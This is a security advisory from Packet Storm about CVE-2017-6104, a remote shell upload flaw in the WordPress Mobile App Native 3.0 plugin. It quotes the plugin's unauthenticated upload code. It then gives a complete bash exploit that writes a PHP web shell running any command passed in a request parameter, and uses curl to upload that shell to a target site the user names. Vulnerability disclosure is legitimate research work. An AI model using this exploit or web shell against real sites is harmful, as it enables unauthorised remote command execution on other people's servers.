WordPress Mobile App Native 3.0 Shell Upload

WordPress Mobile App Native plugin version 3.0 suffers from a remote shell upload vulnerability.

MD5 | 33588d70b1e4e4d09b5f020e76ad9d56

Download

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Vendor Contact: 
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

  if ($_FILES['file']['name']) {
            if (!$_FILES['file']['error']) {
                $name = md5(rand(100, 200));
                $ext = explode('.', $_FILES['file']['name']);
                $filename = $name . '.' . $ext[1];
                $destination = 'images/' . $filename;
                $location = $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                echo $plugin_url.'/server/images/' . $filename;
            }
            else {
              echo  $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
            }
    }
CVEIDs: CVE-2017-6104

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

EXPLOIT:

#!/bin/bash
# Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
# CVE-2017-6104
# Larry W. Cashdollar,@_larry0
# http://www.vapid.dhs.org/advisory.php?v=178

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do
 echo -e ${red};
 echo -e "              Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "                                 3/1/2017";
 echo "                    Larry W. Cashdollar, @_larry0";
 echo
 echo "                           CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done

Source: packetstormsecurity.com